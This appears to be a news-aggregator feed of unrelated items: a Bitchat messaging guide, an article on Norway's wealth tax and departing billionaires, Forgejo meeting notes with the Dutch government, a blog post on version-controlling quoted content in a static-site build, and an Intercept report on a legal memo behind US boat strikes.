We recommend confirming your friends’ and family members’ usernames in person when possible. This helps make sure you’re talking to the right people and avoids confusion or impersonation. Once you’ve confirmed someone’s identity, you can start messaging them privately. You can also “favorite” them so they’re easy to find later.

Begin messaging by using the “type a message…” box. Type in a forward slash / to open the menu for additional commands and options.

Locations:

If you click on the blue #mesh channel on the top right it will open the various location channels available.

  • #mesh: The mesh channel is your local bluetooth network that extends as far as the number of connected devices using Bitchat. So the more users with the ability to relay over distance, the larger the network. This is the channel that will allow you to communicate when all other networks are down.
  • Location channels: You will see default channel names for your block, neighborhood, city, province, and region. These work best when connected to the internet.
  • #Geohash: the geohash channel is a custom channel that you can start to connect with your immediate family or local groups. Type in a name for your channel and click teleport. Users within your network can then join it.

Helpful tips:

  • It is encouraged to clear your messages with the command “/c” on a regular basis. This is good practice in the scenario where your phone is confiscated. Messages are only accessible on device as Bitchat has no central servers. If you delete the messages, they aren’t accessible anywhere.
  • Gaza Online provides renewable eSIMs to restore internet access across Gaza, helping people stay connected and access essential services. Paired with Bitchat, it can help communication continue even when networks are down.

Download Bitchat today and see additional tools that Tech for Palestine has been working on.

Stay connected, stay safe.

Norway's Wealth Tax Unchains a Capital Exodus

Hacker News
citizenx.com
2025-11-14 17:39:35
Comments...
Original Article
Norway's Wealth Tax Unchains a Capital Exodus

Norway's wealth tax increase, expected to raise $146M, led to a $448M net loss as $54B in wealth left the country, reducing tax revenue by $594M.

The recent wealth tax increase in Norway was expected to bring in an additional $146M in yearly tax revenue.

Instead, individuals worth $54B left the country , leading to a lost $594M in yearly wealth tax revenue.

That's a net decrease of $448M+.

The mass departure of Norway's billionaires has transformed into an unprecedented exodus, as the nation's tax administration grapples with one of Europe's most demanding wealth tax and income tax rates. Last year marked a watershed moment in this capital flight, with more than NOK 600 billion in assets leaving the country as high-net-worth individuals increasingly opted for tax havens over their homeland.

The phenomenon has caught the attention of global media, with The Guardian and other outlets documenting the steady stream of super-rich Norwegians seeking refuge in more financially hospitable jurisdictions.

🇳🇴 The recent wealth tax increase in Norway was expected to bring an additional $146M in yearly tax revenue.

Instead, individuals worth $54B left the country, leading to a lost $594M in yearly wealth tax revenue.

A net decrease of $448M+ ↓ pic.twitter.com/9KTndm2BtZ

— CitizenX (@CitizenX) June 3, 2024

The architecture of the extensive Norwegian taxation system

Norway's approach to wealth taxation reflects a sophisticated yet burdensome system that interweaves multiple fiscal obligations.

Each municipality wields authority to levy its own tax rates, while the national government imposes additional charges on personal income, net worth, and various forms of capital.

The current structure encompasses property tax, value added tax, and capital gains tax, creating a comprehensive framework that has prompted many of the nation's wealthiest citizens to reconsider their residency.

The Wealth Tax Burden

The net wealth tax stands at the heart of this controversy. Unlike most OECD countries, which have abandoned such measures, Norway maintains a stringent wealth taxation system. While certain exemptions exist for business assets, the overall burden falls heavily on those with significant net worth.

The valuation of assets for tax purposes, particularly real estate holdings, frequently generates friction between taxpayers and the tax administration, as disagreements arise over assessment methods and fair market determinations.

The Flight of Capital

Norwegian entrepreneurs and billionaires face particularly galling challenges under this tax regime.

The wealth tax rate, combined with dividend tax, often forces business owners to withdraw substantial funds from their companies solely to meet tax obligations. This creates a destructive cycle that hampers business growth and reduces incentives for domestic investment.

The situation becomes even more complex when you consider the exit tax regulations, which insidiously attempt to capture value from departing residents.

Consider the case of one prominent industrialist who faced an annual tax bill of NOK 175 million despite drawing a relatively modest salary from his business operations.

Such disparities between paper wealth and liquid assets have driven many wealthy Norwegians to seek alternatives abroad, with Switzerland emerging as a preferred destination.

The European Context

The contrast with neighboring countries is notable. Not every EU and EU-adjacent country is taking the same approach as Norway and France .

Sweden, once renowned for its high wealth taxes, abandoned such levies years ago, recognizing their potential to drive away capital and talent. Finland and Denmark have similarly opted for different approaches to taxing their wealthy citizens.

Spain remains one of the few European nations maintaining a wealth tax, though its system offers more flexibility through regional variations and exemptions.

The Swiss Alternative

Switzerland's cantons have become particularly attractive to Norway's departing wealthy.

With its favorable tax base and various cantonal incentives, Swiss municipalities offer attractive alternatives to Norway's rigid system.

Cities like Lucerne actively court Norwegian expatriates, creating communities of former Nordic residents who share similar tax-driven motivations for relocation. The absence of inheritance tax in many Swiss regions provides an additional draw for family businesses considering relocation.

Real Estate and Asset Valuation

The treatment of real estate under Norway's wealth tax system presents particular challenges. Property valuations can vary significantly between tax assessment and market value, creating additional complexity for wealthy individuals with substantial real estate holdings.

This disparity affects both residential and commercial property owners, often forcing them to maintain higher cash reserves solely for tax purposes.

Economic Impact and Policy Response

The Norwegian tax administration faces difficult choices as it watches its tax base erode. While property tax and value added tax provide stable revenue streams, the exodus of billionaires threatens significant portions of the government's income.

Recent estimates suggest that departing wealthy individuals control combined fortunes of at least NOK 600 billion - capital that now resides beyond Norway's borders.

Exit Tax Considerations

The government's response has largely focused on tightening exit tax regulations rather than addressing the underlying causes of departure.

New provisions require departing residents to pay taxes on unrealized gains, with payment periods extending up to twelve years. This approach risks accelerating the exodus as wealthy individuals rush to relocate before new restrictions take effect. Austria, another European nation grappling with similar challenges, watches Norway's experience closely as it considers its own wealth tax policies.

The global context and Future Implications

In the broader context of international tax competition, Norway's experience offers crucial lessons about the limits of national tax sovereignty in an era of mobile capital.

While some European nations maintain certain wealth-linked taxes, most have moved toward more flexible systems that acknowledge the reality of global competition for high-net-worth individuals and their investments.

The pressure from tax havens and the mobility of modern capital pose existential challenges to conventional tax policies.

This dynamic particularly affects countries with high wealth tax rates, as they compete not only with traditional low-tax jurisdictions but also with nations offering specialized incentives for wealthy immigrants.

This is why obtaining second citizenship and multiple passports is a crucial diversification strategy in the modern world. Many investors are exploring options like Citizenship by Investment in Argentina to add geographic and legal flexibility to their planning.

Social Implications and Public Debate

The exodus has sparked intense public discourse about social equity and economic incentives. Each tax return season brings fresh reminders of wealthy departures, while policy makers search for ways to maintain public services without driving away the very taxpayers who contribute most to their funding.

Norway’s Wealth Tax and the Founder Exodus @Jason , @alex and @Dune CEO Fredrik Haga discuss how Norway’s wealth tax on unrealized gains is forcing many founders to leave the country, as the policy creates overwhelming financial burdens for startups.

• The Tax Burden: Norway's… pic.twitter.com/h0zkIllAPw

— This Week in Startups (@twistartups) November 26, 2024

Supporters of the current system argue that wealth taxes play a crucial role in maintaining Norway's social democratic model.

Critics counter that driving away successful entrepreneurs ultimately undermines the tax base needed to support social programs.

This debate extends beyond simple fiscal considerations to fundamental questions about the nature of social contracts in an age of global mobility.

Looking Forward

As Norway grapples with these challenges, its experience resonates far beyond its borders. Other OECD countries watch developments closely, recognizing that Norway's wealth tax experiment may shape global tax policy discussions for years to come.

With billions of NOK in assets already relocated and more wealthy individuals considering departure, the pressure for reform continues to mount.

The story of Norway's wealth tax thus represents more than a simple tale of tax rates and capital flight. It embodies fundamental questions about the survival of progressive taxation in a world where capital moves freely across borders.

As the exodus continues, these questions become increasingly urgent, not just for Norway but for all nations seeking to fund robust social services while remaining attractive to mobile wealth and talent.

Meeting notes between Forgejo and the Dutch government via Git commits

Hacker News
codeberg.org
2025-11-14 17:35:17
Comments...
Original Article
@ -0,0 +1,305 @@
#import "@preview/flow:0.3.2" : *
#show : note . with (
title: "Forgejo Dutch Government call notes",
jitsi: [ https://meet.jit.si/ForgejoOSPObzk ] ,
start: "2025-11-11 14:00",
end: "15:00",
protocol: (contributors: (
"multisn8",
"n0toose",
"oliverpool"
))
)
#pagebreak ( weak : true )
= Introduction round
/ Gina : Gi
- Ministry of the interior
- Goal: More open-source
- OpenDesk already is in Germany, now also in Netherlands
- Short-term goal: Setting up a code platform
- This call
- Figuring out how governments can _help_ Forgejo! yay :3
- Do also work together with the French government
/ Gusted : Gu
- Basically a Forgejo contributor since its inception. Also: Computers. Since a long time.
- Forgejo has no higher "level" than contributor
/ oliverpool : O
- Forgejo contributor
- Would enjoy having paid OSS missions to sell to his employer
- Has had contact with French ministry of education: Want to use Forgejo, too
- want to move away from GitLab community edition
- some paid features cannot be accepted as contributions to the community edition
- are considering Forgejo
- but the gitlab-pages migration is not easy
- (Context for protocol: Also made contributions to the notes after the meeting took place.)
/ Multi : M
- just takes notes lol
/ n0toose : N
- Forgejo contributor
- (note taker's audio feed was interrupted, *N* cannot remember what was said.)
- (Context for protocol: Also made contributions to the notes after the meeting took place.)
= Pronunciation
/ N : Whatever (joke)
/ Gu : Forgejo with a silent R
- Coming from Esperanto
= What is Forgejo about?
/ O : Important part of Forgejo: Community and federation
- Federation is _not_ developed by the ones present here
/ Gi : Non-centralized power
- Is also on Codeberg
= Agenda
/ Gi : What the Dutch government...
+ *wants from* Forgejo
+ *can do for* Forgejo
= What the Dutch government wants from Forgejo
/ Gi :
- So far, nothing that isn't already present
- Except: CI
== CI
/ Gu : Supports a lot of CI runners
- Forgejo Actions is built-in
- Reimpl of GH Actions from scratch
- Still in dev: Works towards feature-parity
- Limitations already visible though
- Difficult with more complex pipelines
/ Gi : How easy is adding features?
- Both code and requests?
/ Gu : Easy enough
- "I think as long as there's a use case, it will be accepted"
- Architecture makes it easy enough
/ O : Written in Go, quite approachable
- Expect all contributions to be tested
- Maintainers help out with getting a feature there though!! :3
- Contribution acceptance depends on inherent maintenance effort
- Don't want features that must be dropped after 3 months due to lack of maintenance
- Other CIs can work with Forgejo as well.
- SourceHut: Can trigger CI runs quite easily
- https://codeberg.org/emersion/yojo -- bridge between Sourcehut and Forgejo
- Woodpecker
== Volunteers vs. commercial interests
/ Gi : Are you entirely volunteer-based?
/ N : Depends on who "you guys" (Context: this meeting's attendees or Forgejo's contributors) is
- Even if a contributor works on behalf of a company, the assumption is that their contributions are treated like any other's. "We" expect that we can work together, instead of a mere "push and forget" approach.
- Hard part of contributions are tests and maintenance
- Symbiotic relationship is _necessary_
- *Gu* : Expect maintenance and availability for questions if code is added
- Companies are contributing, too!
- They don't always say it out loud though ^^
/ Gi : Is there any payment structure?
/ O : Individual entities have NLnet grants
- Codeberg has some, too
== Forgejo <> Gitea relation
/ Gi : How does Forgejo relate to Gitea?
/ N : (jokingly) We went "solo".
/ Gu :
- In inception: Soft fork
- A year ago: Hard fork (after final rebase)
- Since then, cherry-picking
- No relationship with Gitea anymore except for past commit history
/ O : https://forgejo.org/2024 -02-forking-forward/
- No relation except for security releases
- Attempts at cooperation and coordination did not work out qwq
== Experience with large institutions/governments
/ Gi : Have you worked with governments before?
/ Gu : No
- Contributors tell in private or present publicly that they are in a company
- But always individuals
- Except for Linux distros
/ Gi : Do you get support requests from them?
/ Gu : Yes, but usually rather technical questions
- e.g. "Why is this slow?", "How can I profile this?"
- Result in issues like any other
/ O :
- Forgejo Actions: Pushed by individual contributors
- Federation: Pushed by company
- Apart from that: Smaller stuff
- 1 contributor "suffices" for each
=== Support contracts/obligations
/ Gi :
- Not worried about features
- Worried about having to provide support though
- Unsure if 3rd party support contract would be necessary
/ Gu : Companies figure out in #emoji .sparkles some way #emoji .sparkles
[ Another forgejo contributor joins and leaves ]
/ O : https://codeberg.org/forgejo/professional -services/issues
- Companies can request and offer services there
- Each company has to decide for themselves if they need them
[ Another forgejo contributor joins and leaves ]
[ Another forgejo contributor joins ]
== Concerns about working together with a government
/ Gi : Are there any concerns about a government starting to use the project?
/ N : We need to figure some questions (i.e. scaling) before that, "we can figure things out as we go"
- Very often, a large organization might start using Forgejo and stumble upon issues after the fact.
/ Gu : OSS: Some contributors may not be excited/positive as far as governments are concerned
- Others treat them as "yet another organization".
[ Another forgejo contributor leaves ]
/ Gi : Fair! Governments have not fulfilled that symbiotic pact in the past
- only "taking", but not "giving back" as much.
== Dedicated scaling talk
/ Gi :
- We're starting a pilot! #emoji .confetti
- Would be cool to talk dedicatedly about scaling
- Could we set that up?
/ N : (half-jokingly) "I nominate gusted"
/ Gu : I do infra for Codeberg, so I'd be the right one for this
/ O : 👏
/ Gi : Phrasing it carefully to avoid draining energy
- Gusted would be a great first start
/ N : Work to use Forgejo as a cluster: https://codeberg.org/forgejo/discussions/issues/259
== Funding
/ Gi : Is NLnet and Codeberg all funding you receive?
/ N : No
- Haven't had financial transparency reports in the past
- Primary source: donations, (single-time, memberships)
- Would have to check in with the other Codeberg entities first
- (Context: There was a mild misunderstanding with the _you_ , so the answer was "on behalf of Codeberg" and not on behalf of Forgejo).
- Mentions of how some organizations/companies can "contribute back to Forgejo" by allocating human resources.
/ Gu : Codeberg is freely allocating funds for Forgejo
/ O : Complimentary with different goals
- Forgejo: Develop Forgejo
- Codeberg: Moderation, promote open source, have an OSS code platform, ...
[ Another forgejo contributor joins ]
= How could a government help Forgejo?
/ Gi : Broadly asking: If a government wants to support you, how could they do it?
- Developers?
- Funds?
- Hardware?
/ O :
- Funds: Complicated with tax paperwork and legal issues though
- People interested in contributing: Easier + more effective
/ Gi :
- Actually glad: Money is hard to move in governments
== Federation
/ Gi :
- How is the federation work going?
/ N : Lots of work
- Plugging a lot of things out and back in, tech debt over several projects
- Cannot make any guarantees
- More pressure is bad
- TL;DR: It's slow, but going. It's complicated.
/ Gi : Impressed with the ambition, understand that it's hard
/ N : The goal is to move from having "yet another single point of failure" (i.e. SourceForge, then GitHub, then Codeberg, etc.)
- "Just gonna take a while"
/ Gi : Basic plan: Want to have our own instance
- Would be cool to federate though!
- Use OpenID connect login
- Technical details though
- Happy to hear you're open for collaboration!
/ N : Everyone (companies, governments, big instances like Codeberg's, etc.) benefits! ^^
= Closing questions
== Code of Conduct
/ M : How would CoC work with government projects like this?
/ Gi : Individual projects figure that out -- we don't have experience with OSS yet
== Keeping in touch
/ Gi : How can we keep in touch?
/ O : If you have a CB account, you can comment on https://codeberg.org/forgejo/discussions/issues/412
- Easier to work with if it's in public
== Protocol confirmation
/ N : Are you okay with this protocol being public?
/ Gi : Yes, I am
== Motivation for Dutch government to contact Forgejo
/ Gi : This a good start, are there any questions?
/ Gu : What was the primary motivation for switching away from proprietary platforms?
/ Gi : ICC having their MS accounts blocked
- Made them very aware of ecosystem fragility
- Looked at their dependencies and alternatives
- Digital sovereignty: Hot topic ^^
== Next steps
/ O : What would be the next step?
/ Gi : (mentions of red tape/bureaucracy that has to be dealt on OSPO's end)
- Seeing how this can work out with e.g. different departments.
- 80% bureaucracy, 20% actual stuff.
- Seeing how we can contribute back to you (and other projects).
- "Lots of work on our part!"

Version Control External Content Referenced in Your Blog

Lobsters
lgug2z.com
2025-11-14 17:34:59
Comments...
Original Article

It seems like most blogs I read these days are built using a static site generator (SSG).

Some of these SSGs come with shortcodes for embedding content from popular websites, others don't, but shortcodes are generally the accepted way of embedding a reference to something someone else said on the internet in one of your posts.

I recently wrote about how brittle I find these shortcodes that call out to external websites, and instead wrote One Shortcode to Rule Them All which references things directly from my own personal knowledge base.

But we can still do better.

@LGUG2Z I wish that SSGs would store the data from the remote URL in a file you could keep under version control. e.g., for tweets, I do something like {{<tweet id="12345">}} and on first build, it downloads the profile image, name, tweet content, and timestamp and renders that, and it works forever.

I keep finding broken tweets on my Hugo site because Twitter's rate limiting something or the user deleted their tweet. I've resorted to just screenshotting, which feels sloppy.

Michael is on to something... Embedding his comment here didn't trigger a HTTP request when this article was built!

This is also something that I have thought about before, but writing a middleware layer to cache referenced content from disparate sources to plug in to SSG codebases I'm not really familiar with was never an idea that really pulled me in.

I too had previously resorted to screenshotting and embedding images, but that process doesn't feel good, and I don't like adding more and more image files to my git repo. My requirements are also a bit simpler because I don't really care about rendering a user's profile picture from an external site or showing a timestamp.

Since I'm now pulling in all my quoted external content from a single data source, I can implement a pre-build step which will allow me to version control all of the external content referenced in my articles. I just need three things:

  1. A list of sources
# sources

https://m.mtlynch.io/@michael/115538492543985760
  1. A file which maps those sources to the data required to render them
// library.json
{
  "https://m.mtlynch.io/@michael/115538492543985760": {
    "title": "michael",
    "source_display": "m.mtlynch.io",
    "source_url": "https://m.mtlynch.io/@michael/115538492543985760",
    "content": "@LGUG2Z I wish that SSGs would store the data from the remote URL in a file you could keep under version control. e.g., for tweets, I do something like `{{<tweet id=\"12345\">}}`  and on first build, it downloads the profile image, name, tweet content, and timestamp and renders that, and it works forever.\n\nI keep finding broken tweets on my Hugo site because Twitter's rate limiting something or the user deleted their tweet. I've resorted to just screenshotting, which feels sloppy."
  }
}
  1. A shortcode which can look up and render the data using the source URL
<!-- library.html -->

{% if url %}
    {% set library = load_data(path="library.json") %}
    {% set quote_data = library | get(key=url) %}

    <div class="notado-quote"
         style="border: 1px solid var(--border-color);
                background-color: var(--bg-primary) !important;
                position: relative;
                margin-block: 1em;
                border-radius: 5px;
                padding-left: 1rem;
                padding-right: 1rem;
                padding-top: 1.25rem;
                padding-bottom: 1.25rem;
                {% if caption %} margin-bottom: 0em;
                border-bottom-right-radius: 0px !important;
                border-bottom-left-radius: 0px !important;
                {% endif %}">

        <div style="padding-bottom: 1.25rem">
            <div style="display: flex; gap: 0.75rem">
                <div style="min-width: 0;
                            flex: 1 1 0%;
                            display: flex;
                            flex-direction: column;
                            justify-content: center">
                    <p style="text-overflow: ellipsis;
                              overflow: hidden;
                              white-space: nowrap;
                              margin: 0em">
                        {{ quote_data.title }}
                    </p>
                    <p style="color: var(--text-1); margin: 0em">
                        {% if quote_data.source_url %}
                            <a href="{{ quote_data.source_url }}">{{ quote_data.source_display }}</a>
                        {% else %}
                            {{ quote_data.source_display | split(pat=" - ") | first }}
                        {% endif %}
                    </p>
                </div>

                <div style="flex-shrink: 0;
                            display: flex;
                            flex-direction: row-reverse;
                            align-items: center">
                    <a class="notado-icon" href="https://notado.app" style="border: none">
                        <img style="height: 3rem;
                                    width: 3rem"
                             src="https://notado.app/static/notado-icon.png"
                             alt="notado" />
                    </a>
                </div>
            </div>
        </div>

        {# djlint:off #}
        <div>{{ quote_data.content | markdown(inline=true) | safe }}</div>
        {# djlint:on #}
    </div>

    {% if caption %}
        <div class="notado-quote-caption"
             style="border: 1px solid var(--border-color);
                    background-color: var(--bg-2) !important;
                    position: relative;
                    margin-bottom: 1em;
                    border-bottom-left-radius: 5px;
                    border-bottom-right-radius: 5px;
                    padding-left: 1rem;
                    padding-right: 1rem;
                    padding-top: 0.5rem;
                    padding-bottom: 0.5rem">
            {{ caption }}
        </div>
    {% endif %}
{% endif %}

The first two pieces are the really interesting ones.

I maintain a CLI tool for my knowledge base which I extended with a command which takes a list of source URLs and updates a library file.

❯ notado-cli quote-gen
Adding quote data for https://bsky.app/profile/hmsnofun.bsky.social/post/3lmr6sm5k4k2b to library.json
Adding quote data for https://defcon.social/@corbden/113473397794111625 to library.json
Adding quote data for https://discourse.nixos.org/t/should-organizations-relating-to-the-defense-sector-being-able-to-sponsor-nixos/41252/6 to library.json
Adding quote data for https://lobste.rs/s/rzskjk/i_think_i_m_done_thinking_about_genai_for#c_l9x7we to library.json
Adding quote data for https://old.reddit.com/r/patientgamers/comments/udzo11/i_miss_the_days_of_server_browsers_and_community/i6lga1o/ to library.json
Adding quote data for https://programming.dev/comment/5789966 to library.json
Adding quote data for https://tildes.net/~tech/17xe/permanent_archival_formats_do_they_exist#comment-9feo to library.json
Adding quote data for https://twitter.com/mitchellh/status/1744850961309597855?s=12 to library.json
Adding quote data for https://www.youtube.com/watch?v=k0J0Dxf5JKc&lc=Ugwsmg7c0JpYiXyADQV4AaABAg to library.json

Whenever a new source is added and the command is run again, requests will only be made to fill in the library file with new data:

❯ notado-cli quote-gen
Skipping https://bsky.app/profile/hmsnofun.bsky.social/post/3lmr6sm5k4k2b as data is already in library.json
Skipping https://defcon.social/@corbden/113473397794111625 as data is already in library.json
Skipping https://discourse.nixos.org/t/should-organizations-relating-to-the-defense-sector-being-able-to-sponsor-nixos/41252/6 as data is already in library.json
Skipping https://lobste.rs/s/rzskjk/i_think_i_m_done_thinking_about_genai_for#c_l9x7we as data is already in library.json
Adding quote data for https://m.mtlynch.io/@michael/115538492543985760 to library.json
Skipping https://news.ycombinator.com/item?id=41841873 as data is already in library.json
Skipping https://old.reddit.com/r/patientgamers/comments/udzo11/i_miss_the_days_of_server_browsers_and_community/i6lga1o/ as data is already in library.json
Skipping https://programming.dev/comment/5789966 as data is already in library.json
Skipping https://tildes.net/~tech/17xe/permanent_archival_formats_do_they_exist#comment-9feo as data is already in library.json
Skipping https://twitter.com/mitchellh/status/1744850961309597855?s=12 as data is already in library.json
Skipping https://www.youtube.com/watch?v=k0J0Dxf5JKc&lc=Ugwsmg7c0JpYiXyADQV4AaABAg as data is already in library.json

In order to make diffs more pleasant after updates to the library file, I decided to serialize it using a BTreeMap so that the serialized JSON object will be sorted alphabetically by the URL keys.

With all these pieces in place, I can call my new shortcode to render this data without making any outgoing HTTP requests at build-time... Just like I did earlier in this article!

{{
  library(
    url="https://m.mtlynch.io/@michael/115538492543985760",
    caption="Michael is on to something... Embedding his comment here didn't trigger a HTTP request when this article was built!"
  )
}‌}

One of my greatest pleasures in life is building my own tools which work the way that I want them to work.

The initial feeling of gratification upon their completion soon fuels even more creativity in me as I slowly uncover new ways to integrate all of the different tools that I have built to target more and more of the papercuts that are just waiting to be addressed in the background of my life.


If you have any questions or comments you can reach out to me on Bluesky and Mastodon .

If you're interested in what I read to come up with solutions like this, you can subscribe to my Software Development RSS feed .

If you'd like to watch me writing code while explaining what I'm doing, you can also subscribe to my YouTube channel .

If you would like early access to komorebi for Mac , you can sponsor me on GitHub .

Secret Boat Strike Memo Justifies Killings By Claiming the Target Is Drugs, Not People

Intercept
theintercept.com
2025-11-14 17:28:25
In a memo promising legal immunity for those who kill alleged drug traffickers, the Trump administration floated an unusual legal theory. The post Secret Boat Strike Memo Justifies Killings By Claiming the Target Is Drugs, Not People appeared first on The Intercept....
Original Article

The Trump administration is promising legal cover for military personnel who carry out lethal attacks on the alleged drug smugglers in the waters surrounding Latin America.

Amid mounting questions from senior military and civilian lawyers about the legality of proposed strikes on civilian boats, the Justice Department’s Office of Legal Counsel this summer produced a classified opinion intended to shield service members up and down the chain of command from prosecution, according to three government officials.

The legal theory advanced in the finding, two sources said, differs from some of President Donald Trump’s public statements on the killings. It claims that narcotics on the boats are lawful military targets because their cargo generates revenue for cartels whom the Trump administration claims are in armed conflict with the U.S.

One senior defense official, speaking on the condition of anonymity, blasted the opinion. “I don’t know what’s more insane – that the ‘President of Peace’ is starting an illegal war or that he’s giving a get out of jail free card to the U.S. military,” said the official, referencing President Donald Trump’s self-proclaimed moniker . “Hopefully they realize there’s no immunity for war crimes. Nor is there a statute of limitations.”

The Trump administration continues to keep the OLC memo from the American people but, this week, finally allowed members of Congress and their staffs to read the document. On Wednesday, just 20 copies were made available in a secure room, causing delays among lawmakers and staffers who have been waiting months to understand the legal reasoning underpinning the attacks.

On Thursday evening, War Secretary Pete Hegseth said that the campaign of attacks is called Operation Southern Spear. Led by Joint Task Force Southern Spear and Southern Command, “this mission defends our Homeland, removes narco-terrorists from our Hemisphere, and secures our Homeland from the drugs that are killing our people,” he wrote on X. Southern Spear kicked off earlier this year as part of the Navy’s next-generation effort to use small robot interceptor boats and vertical take-off and landing drones to conduct counternarcotics operations.

The military has carried out 20 known attacks, destroying 21 boats in the Caribbean Sea and eastern Pacific Ocean since September, killing at least 80 civilians. The most recent attack, on a vessel in the Caribbean on Monday, first reported by CBS on Thursday, reportedly killed four people. Following most of the attacks, Hegseth or Trump have claimed that the victims belonged to an unspecified designated terrorist organization, or DTO.

A list of DTOs, consisting of Latin American cartels and criminal organizations, is attached to the OLC opinion which claims that attacks on suspected drug traffickers in the Caribbean and Pacific are lawful and that personnel involved are immune from prosecution.

“The strikes were ordered consistent with the laws of armed conflict, and as such are lawful orders. Military personnel are legally obligated to follow lawful orders and, as such, are not subject to prosecution for following lawful orders,” a Justice Department spokesperson told The Intercept.

Experts in the laws of war and members of Congress say the strikes are illegal extrajudicial killings because the military is not permitted to deliberately target civilians — even suspected criminals — who do not pose an imminent threat of violence. The summary executions are a significant departure from standard practice in the long-running U.S. war on drugs , in which law enforcement arrested suspected drug smugglers .

Senior government attorneys questioned the legality of the strikes long before they began, sources told The Intercept. “I’m not surprised that civilian and military lawyers raised significant concerns with these strikes, given that they are manifestly unlawful even under the most permissive wartime legal frameworks government lawyers have deployed at any point in the past two decades,” Rebecca Ingber, a former State Department lawyer and law-of-war expert told The Intercept.

One current government official speaking anonymously, as well as Brian Finucane, a former State Department lawyer who is a specialist in counterterrorism issues and the laws of war, both drew specific attention to the fact that this summer — at the time the Defense Department officials were expressing reservations about the legality of summary executions of alleged drug smugglers — Trump signed a secret directive ordering the Pentagon to use military force against Latin American drug cartels he has labeled terrorist organizations.

“There was a policy desire for strikes at sea and there was pushback, potentially from Joint Staff and Southern Command, on those requests, both on policy grounds, but also on legal grounds,” said Finucane, now the senior adviser for the U.S. program at the International Crisis Group. “That seems to have generated two documents: this permission slip from OLC, blessing these actions as legal, and the directive from the White House basically telling DOD ‘No! You will develop these options.’”

Several government officials suggested to The Intercept that Rear Adm. Milton “Jamie” Sands III, head of Naval Special Warfare Command, was fired by Hegseth in August due to the admiral’s concerns about impending attacks on civilian vessels by Special Operations forces. Pentagon press secretary Kingsley Wilson denied the officials’ claims, and Sands did not respond to repeated requests by The Intercept for an interview.

Last month, Adm. Alvin Holsey — the chief of Southern Command — announced his retirement years ahead of schedule. “Never before in my over 20 years on the committee can I recall seeing a combatant commander leave their post this early and amid such turmoil,” said Rep. Adam Smith, D-Wash., the top Democrat on the House Armed Services Committee.

Current and former government officials familiar with the OLC opinion say that it relies on a theory for the strikes that differs from the Trump administration’s public pronouncements. “Every single boat that you see that’s shot down kills 25,000 [Americans] on drugs and destroys families all over our country,” Trump said on “60 Minutes” recently . But the OLC opinion indicates that it is the sale of drugs, what is known as the “revenue generating target theory,” that the U.S. relies on to claim the narcotics aboard the boats are military objectives and, thus, lawful targets under the law of war. Under this theory, the civilians aboard would be considered collateral damage, and their deaths would be excused through a proportionality analysis tied to the military advantage gained by the attack.

Experts say the OLC reasoning is faulty and appears to have been fashioned to suit a political decision already made by the White House. While such theories have been employed before, such as ultimately fruitless strikes on drug labs in Afghanistan, they were in the context of actual armed conflicts against true belligerents, like the Taliban.

The OLC opinion also argues that, in conducting the attacks, the U.S. is coming to the collective self-defense of various Latin American countries, even if strikes are, in some cases, killing their nationals. “The Western Hemisphere is America’s neighborhood — and we will protect it,” Hegseth wrote in his Thursday Southern Spear announcement . Experts also say that such a unilateral decision, without a request from the nations being defended, is also unprecedented.

“It’s legal Mad Libs. They’re throwing all these terms and concepts at the wall.”

“It really strikes me that OLC was given an assignment. ‘We need a legal justification to do the following’ and then they just cooked something up. This is legal backfilling. ‘How do you lawyer your way to yes?’” said Finucane. “It’s legal Mad Libs. They’re throwing all these terms and concepts at the wall, but there’s no real content or substance behind them.”

The Intercept reported last month that the Trump administration secretly declared DTOs were in a state of “non-international armed conflict” with the United States during the summer, long before the attacks commenced. Despite concluding that the U.S. is involved in armed conflict, the OLC opinion nonetheless claims the operation is not covered by the War Powers Resolution, a 1973 law that requires presidents to terminate deployments of troops into “hostilities” after 60 days if Congress has not authorized them.

The OLC opinion, which runs nearly 50 pages, argues that these non-international armed conflicts are waged under the president’s Article II constitutional authority as commander in chief of the U.S. military, which is key to the argument that the strikes are permissible under domestic law.

The list of groups supposedly engaged in armed conflict with the United States, as The Intercept previously reported , includes the Venezuelan gang Tren de Aragua; Ejército de Liberación Nacional, a Colombian guerrilla insurgency; Cártel de los Soles, a Venezuelan criminal group that the U.S. claims is “headed by [Venezuelan President] Nicolas Maduro and other high-ranking Venezuelan individuals”; and several groups affiliated with the Sinaloa Cartel, according to two government sources who spoke to The Intercept on the condition of anonymity because they were not authorized to disclose classified information. The Justice Department, War Department, and White House have repeatedly failed to respond to requests for comment.

“I’ve seen no evidence or even allegations that suggest there has been an armed attack on the United States.”

“For the United States to use military force in ‘self-defense’ against a non-state actor — as the government has asserted to Congress — or a state, the standard is whether we have suffered an ‘armed attack,’ in which case we may use force in self-defense to repel that attack. This is a term of art that has meaning. For example, the attacks of 9/11, the worst attacks on the homeland since Pearl Harbor, constituted the armed attack to which the U.S. responded in the conflict with al Qaeda,” said Ingber, now a law professor at Cardozo Law School in New York. “I’ve seen no evidence or even allegations that suggest there has been an armed attack on the United States. I’ve seen nothing to suggest that any of these alleged drug smugglers are acting as part of an organized armed group, or that they are involved in military-like hostilities with the United States, let alone prolonged hostilities.”

Experts say it’s unlikely that military personnel will face prosecution by a future administration for their roles in the extrajudicial killings of suspected drug smugglers that are covered by the OLC finding. “Legal advice, including an OLC opinion, itself does not provide ‘immunity’ per se,” Ingber told The Intercept. “But good faith reliance on it in this case would be a significant hurdle to prosecution.” Still, experts caution that there is no guarantee of absolute immunity.

A secret January 2002 OLC memo claimed that “customary international law cannot bind the executive branch under the Constitution,” empowering the George W. Bush administration, during the early days of the war on terror, to ignore the prohibition of torture under international law. “We conclude that customary international law, whatever its source and content, does not bind the President, or restrict the actions of the United States military,” it reads.

While Bush and top administration officials never faced legal consequences for the torture of detainees, low-level U.S. guards involved in the abuse of prisoners at Abu Ghraib prison in Iraq were court-martialed and convicted . A 2008 Senate Armed Services Committee report concluded “abuse of detainees at Abu Ghraib in late 2003 was not simply the result of a few soldiers acting on their own,” but that:

Secretary of Defense Donald Rumsfeld’s December 2, 2002 authorization of aggressive interrogation techniques and subsequent interrogation policies and plans approved by senior military and civilian officials conveyed the message that physical pressures and degradation were appropriate treatment for detainees in U.S. military custody. What followed was an erosion in standards dictating that detainees be treated humanely.

While U.S. civilian leaders and high-ranking U.S. officers routinely escape punishment for atrocities, not all top officials evade justice. During his first term in office, Trump regularly praised President Rodrigo Duterte of the Philippines and said he was doing an “unbelievable job on the drug problem.” Duterte’s government was, in fact, carrying out summary executions of suspected drug dealers. Duterte now faces charges of crimes against humanity at the International Criminal Court for his drug war.

Power Companies Are Using AI To Build Nuclear Power Plants

403 Media
www.404media.co
2025-11-14 17:28:04
